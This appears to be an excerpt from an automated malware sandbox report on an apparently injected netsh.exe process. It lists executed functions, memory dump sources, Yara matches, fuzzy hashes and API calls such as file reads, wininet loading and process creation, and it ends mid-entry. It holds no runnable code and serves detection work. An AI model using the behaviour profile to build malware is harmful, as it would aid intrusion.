                                                Similarity
                                                • API ID: __fassign
                                                • String ID:
                                                • API String ID: 3965848254-0
                                                • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                • Instruction ID: c5c6ff21687514e1d96d00d2caf9acf8297ec8c698c99a0c8ac3dff7d0cc2a40
                                                • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                • Instruction Fuzzy Hash: A2919172D0021AEFDF24CF59C855AAFB7B8FF55309F24847AD445A72A2E7304A41CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Analysis Process: netsh.exe PID: 1864 Parent PID: 1764 netsh.exeCOMMON

                                                Executed Functions

                                                Function 000985B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,00093BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00093BA7,007A002E,00000000,00000060,00000000,00000000), ref: 000985FD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID: .z`
                                                • API String ID: 823142352-1441809116
                                                • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                • Instruction ID: 1de84a8c26ebc7edd3a087416065dc0c436bebed3768d0cfcb9c803ae6bcc167
                                                • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                • Instruction Fuzzy Hash: E5F0B2B2200208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E811CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00098660, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!:,FFFFFFFF,?,b=,?,00000000), ref: 000986A5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID: !:
                                                • API String ID: 2738559852-2595984152
                                                • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                • Instruction ID: 42a30f2ef5156c0618ecd3b7f0fe7c448ee075f7671ce12c6632b566645b51a6
                                                • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                • Instruction Fuzzy Hash: EDF0A4B2200208ABCB14DF89DC85EEB77ADAF8C754F158248BA1D97255DA30E811CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000986E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtClose.NTDLL(@=,?,?,00093D40,00000000,FFFFFFFF), ref: 00098705
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID: @=
                                                • API String ID: 3535843008-2632950984
                                                • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                • Instruction ID: f87540569f30c08a7b2809185a3ce9d153d9c9dab6d2862f9557835a10c29ec1
                                                • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                • Instruction Fuzzy Hash: EED01776200214ABDB10EB99CC89EE77BADEF48760F154499BA189B242C930FA0086E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C700C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.698278998.0000000000C60000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000008.00000002.698270211.0000000000C50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698400307.0000000000D40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698411864.0000000000D50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698421886.0000000000D54000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698435583.0000000000D57000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698444149.0000000000D60000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698493714.0000000000DC0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C707AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.698278998.0000000000C60000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000008.00000002.698270211.0000000000C50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698400307.0000000000D40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698411864.0000000000D50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698421886.0000000000D54000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698435583.0000000000D57000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698444149.0000000000D60000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698493714.0000000000DC0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C6F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.698278998.0000000000C60000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000008.00000002.698270211.0000000000C50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698400307.0000000000D40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698411864.0000000000D50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698421886.0000000000D54000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698435583.0000000000D57000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698444149.0000000000D60000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698493714.0000000000DC0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C6F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.698278998.0000000000C60000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000008.00000002.698270211.0000000000C50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698400307.0000000000D40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698411864.0000000000D50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698421886.0000000000D54000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698435583.0000000000D57000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698444149.0000000000D60000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698493714.0000000000DC0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C6FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.698278998.0000000000C60000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000008.00000002.698270211.0000000000C50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698400307.0000000000D40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698411864.0000000000D50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698421886.0000000000D54000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698435583.0000000000D57000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698444149.0000000000D60000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698493714.0000000000DC0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C6FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.698278998.0000000000C60000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000008.00000002.698270211.0000000000C50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698400307.0000000000D40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698411864.0000000000D50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698421886.0000000000D54000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698435583.0000000000D57000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698444149.0000000000D60000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698493714.0000000000DC0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C6FB50, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.698278998.0000000000C60000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000008.00000002.698270211.0000000000C50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698400307.0000000000D40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698411864.0000000000D50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698421886.0000000000D54000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698435583.0000000000D57000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698444149.0000000000D60000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698493714.0000000000DC0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C6FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.698278998.0000000000C60000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000008.00000002.698270211.0000000000C50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698400307.0000000000D40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698411864.0000000000D50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698421886.0000000000D54000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698435583.0000000000D57000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698444149.0000000000D60000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698493714.0000000000DC0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C6FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.698278998.0000000000C60000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000008.00000002.698270211.0000000000C50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698400307.0000000000D40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698411864.0000000000D50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698421886.0000000000D54000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698435583.0000000000D57000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698444149.0000000000D60000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698493714.0000000000DC0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C6FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.698278998.0000000000C60000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000008.00000002.698270211.0000000000C50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698400307.0000000000D40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698411864.0000000000D50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698421886.0000000000D54000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698435583.0000000000D57000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698444149.0000000000D60000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698493714.0000000000DC0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C6FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.698278998.0000000000C60000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000008.00000002.698270211.0000000000C50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698400307.0000000000D40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698411864.0000000000D50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698421886.0000000000D54000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698435583.0000000000D57000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698444149.0000000000D60000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698493714.0000000000DC0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C6FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.698278998.0000000000C60000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000008.00000002.698270211.0000000000C50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698400307.0000000000D40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698411864.0000000000D50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698421886.0000000000D54000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698435583.0000000000D57000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698444149.0000000000D60000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698493714.0000000000DC0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C6FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.698278998.0000000000C60000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000008.00000002.698270211.0000000000C50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698400307.0000000000D40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698411864.0000000000D50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698421886.0000000000D54000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698435583.0000000000D57000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698444149.0000000000D60000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698493714.0000000000DC0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000972D0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNELBASE(000007D0), ref: 00097378
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: net.dll$wininet.dll
                                                • API String ID: 3472027048-1269752229
                                                • Opcode ID: 0e0f1f6d1fafdb56955194635ccd88bb99071a4d5cc6d6ba898ad089b8df842c
                                                • Instruction ID: 25e15f9e0eaf9be1d167b319bd70b42c6817def8354a39bca66433acbe3b411f
                                                • Opcode Fuzzy Hash: 0e0f1f6d1fafdb56955194635ccd88bb99071a4d5cc6d6ba898ad089b8df842c
                                                • Instruction Fuzzy Hash: EF3181B6505600ABDB11DF64C8A1FABB7F8EF48700F04811DFA5D5B242D770A945DBE0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000972C8, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 83sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNELBASE(000007D0), ref: 00097378
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: net.dll$wininet.dll
                                                • API String ID: 3472027048-1269752229
                                                • Opcode ID: 24b43874729f3f307d560beb17bfb3c1597fbd99df480d142f9bba9d0d359242
                                                • Instruction ID: 426276a22ed83ee96a6edf276fd951f9a7a913b3de381eee644b894f019b6ca1
                                                • Opcode Fuzzy Hash: 24b43874729f3f307d560beb17bfb3c1597fbd99df480d142f9bba9d0d359242
                                                • Instruction Fuzzy Hash: 78318FB2605200ABDB10DF64C8A1FABB7B4FF48704F14812DFA5D9B242D770A545EBE0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000988C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083B93), ref: 000988ED
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID: .z`
                                                • API String ID: 3298025750-1441809116
                                                • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                • Instruction ID: 36b8d408deaa339e8ae1c72fd208a79468ed6cf9610c5a0c6c98e821003f2e4a
                                                • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                • Instruction Fuzzy Hash: FEE012B1200208ABDB18EF99CC49EA777ADAF88750F018558BA085B252CA30E910CAF0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00087280, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000872DA
                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000872FB
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: 88f562c184ae37d093af23ba06a366c5bb95a27bdb7d34895bc7096f1526536c
                                                • Instruction ID: 76137ffd9ee375fd82fb3786031b09c5070340f9f32425ac97783d936eb0b4c9
                                                • Opcode Fuzzy Hash: 88f562c184ae37d093af23ba06a366c5bb95a27bdb7d34895bc7096f1526536c
                                                • Instruction Fuzzy Hash: C301A731A8022877EB21B6949C03FFE776C6B01F50F140114FF04BA1C2EA946A0547F6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00089B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00089BA2
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                                • Instruction ID: 0a12588c27eefc104df6827deb66a12df96b9a8d24a78904b543997f715d5111
                                                • Opcode Fuzzy Hash: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                                • Instruction Fuzzy Hash: 820112B5D0010DBBDF10EAE4ED42FEDB7B8AB54704F044195A90897142F671EB14D791
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0009892D, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00098984
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInternalProcess
                                                • String ID:
                                                • API String ID: 2186235152-0
                                                • Opcode ID: 71d1dda26f9bf239f3b30ba390ba55d7db564bf65d52b519873bfa10559fca1b
                                                • Instruction ID: 0336a58dfeeaeb8725eb0a32f8cdc94570be2f3f0a4ec5426f75f30a101ef857
                                                • Opcode Fuzzy Hash: 71d1dda26f9bf239f3b30ba390ba55d7db564bf65d52b519873bfa10559fca1b
